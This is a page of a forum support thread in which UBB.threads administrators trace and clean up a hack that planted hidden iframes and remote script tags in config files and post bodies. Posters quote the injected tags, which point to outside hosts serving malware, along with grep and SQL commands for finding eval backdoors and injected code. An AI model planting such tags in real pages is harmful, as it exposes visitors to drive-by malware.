Previous Thread
Next Thread
Print Thread
Hop To
Page 2 of 2 1 2
Joined: Sep 2008
Posts: 82
journeyman
journeyman
Joined: Sep 2008
Posts: 82
You've gotta love Google... For some reason this response just struck me as funny on several levels:

Quote
Hello,

Thank you for submitting a report regarding unauthorized ad code on your site. Please be aware that these ads were placed on your website without our knowledge. If you haven't already done so, you can remove the ads from your site by deleting the ad code from your site's source. In addition, we suggest that you review your site’s security to ensure that unauthorized individuals aren't able to access your website's source code.

Please rest assured that we will investigate this matter and take the appropriate actions. However, we're unable to disclose any details about the investigation, including information about the account associated with the unauthorized ad code or our decision.

We appreciate your understanding.

Sincerely,

The Google AdSense Team

Joined: Apr 2004
Posts: 233
Likes: 1
D
Enthusiast
Enthusiast
D Offline
Joined: Apr 2004
Posts: 233
Likes: 1
Does it appear that the hack got in through an attached file to a post? My board does not have attached files allowed so I'm wondering if my board may be susceptible.


DennyP - www.dennyp.com
DennyP Travel
Joined: Jan 2012
Posts: 95
D
journeyman
journeyman
D Offline
Joined: Jan 2012
Posts: 95
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to google and he is retaliating. mad


Life is Good on Bremer Pond

Bremer Pond Weather
Joined: Dec 2003
Posts: 6,628
Likes: 85
Joined: Dec 2003
Posts: 6,628
Likes: 85
Originally Posted by dbremer
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to google and he is retaliating. mad
Well pondboss appears to be working currently.
Using the url of http://forums.pondboss.com/
So did something change?


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Joined: Jun 2011
Posts: 112
Sysop
Sysop
Joined: Jun 2011
Posts: 112
looking into this, sending some logs to SD...

Joined: Apr 2007
Posts: 3,940
Likes: 1
SD Offline
Former Developer
Former Developer
Joined: Apr 2007
Posts: 3,940
Likes: 1
i've been looking at it with Rick too, since he is able to shell into a targetted server and watch closely wink

Joined: Jan 2012
Posts: 95
D
journeyman
journeyman
D Offline
Joined: Jan 2012
Posts: 95
It was a screw up at the hosting company. They rectified and said it won't happen again.

Sorry I didn't post sooner but I don't take an Internet machine with me when I am out fishing. crazy


Life is Good on Bremer Pond

Bremer Pond Weather
Joined: Sep 2008
Posts: 82
journeyman
journeyman
Joined: Sep 2008
Posts: 82
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.

Joined: Dec 2003
Posts: 6,628
Likes: 85
Joined: Dec 2003
Posts: 6,628
Likes: 85
Originally Posted by bakerzdosen
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.
I get a :
Quote
We encountered a problem. The reason reported was

Unable to connect to database server, please try again in a few minutes.

Please click back to return to the previous page.


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Joined: Sep 2008
Posts: 82
journeyman
journeyman
Joined: Sep 2008
Posts: 82
Well, FWIW, I did something that might have been "dumb" (wouldn't be the first time in my life.)

I have a cronjob running (I alluded to in an earlier post) that deletes all php code from the writable directories. It's possible that may have interrupted the exploit...

Joined: Sep 2008
Posts: 82
journeyman
journeyman
Joined: Sep 2008
Posts: 82
Well, in poking around a bit, I found this at the top of our includes/config.inc.php file:

Quote
<iframe src=http://www.ghananation.com/Alumni/photos/albums/ads.html width=116 height=1 frameborder=0></iframe>

Removing that fixed the problem.

Sheesh. I've gotta work on locking this down a LOT more. For now at least, I 744'd that file (which is owned by root.)

NOTE: You probably do NOT want to open that page if you're running a Microsoft operating system. Consider yourself warned.

Quote
This program must be run under Win32

Last edited by bakerzdosen; 09/03/2012 6:06 PM.
Joined: Mar 2007
Posts: 522
Addict
Addict
Joined: Mar 2007
Posts: 522
At least it's running now.


Steve

UBB.classic from 2000-2003
UBB.threads from 2003-present!
Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Here's a few commands you'll want to run from shell to look for any more exploited code

grep -R eval * | grep POST
grep -R eval * | grep REQUEST

Found a few of these in various files on a couple servers that allowed for the hacker to pretty much do whatever they want.

Joined: Sep 2008
Posts: 82
journeyman
journeyman
Joined: Sep 2008
Posts: 82
Rick,

I never mentioned: Thanks for that. I found two more places where they'd injected code in a similar manner. One in our includes/header.php file and one in a php file in images/forumimages/default/.

I'm becoming chmod'ing fool on this server... I'm about to find out what happens when UBB is incredibly restricted due to permissions to the filesystem.

Joined: Feb 2007
Posts: 48
E
journeyman
journeyman
E Offline
Joined: Feb 2007
Posts: 48
Originally Posted by Rick
Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:

<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>

It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.

Quick way to check would be to run the following SQL:

select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'


We scrubbed Sniper's Hide and now we are just dealing with what is on left on the two other sites,

forums.weddingbells.ca

forums.canadianfamily.ca

The hackers left several pieces of code and back doors in, but my biggest issues is the dump that pulls from these two other sites putting a huge load on our forum.

We have the latest software installed, the patches and all, but still we can't control what was inserted into other sites.

if anyone knows these two sites have them scrub there pages as it is still pulling from there.

Joined: Jun 2006
Posts: 16,366
Likes: 126
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,366
Likes: 126
Could you have your server guys deny requests to the server from those ip's that're trolling content on your site?


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Feb 2007
Posts: 48
E
journeyman
journeyman
E Offline
Joined: Feb 2007
Posts: 48
I think they did, apparently it is not working,

Joined: Oct 2007
Posts: 464
Likes: 11
Addict
Addict
Joined: Oct 2007
Posts: 464
Likes: 11
So did anyone ever figure out what the entry point was?


The Stovebolt Geek
https://www.stovebolt.com/ubbthreads/ubbthreads.php

Server Information
UBB.threads Version 8.0.0
Release 20240826
Server OS Linux
Server Load 0.11
Web Server Apache/2.4.37
PHP Version 8.3.11
MYSQL Version 8.0.39
Database Size 1.82 GB
Page 2 of 2 1 2

Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
Not allowing attachment over 2m
by ehill - 12/03/2024 3:16 PM
New Admin Here
by SenecaFlyer - 12/02/2024 4:14 PM
Post Counts zeroed out
by Baldeagle - 11/03/2024 3:05 PM
Who's Online Now
0 members (), 1,448 guests, and 60 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.1
(Snapshot build 20240918)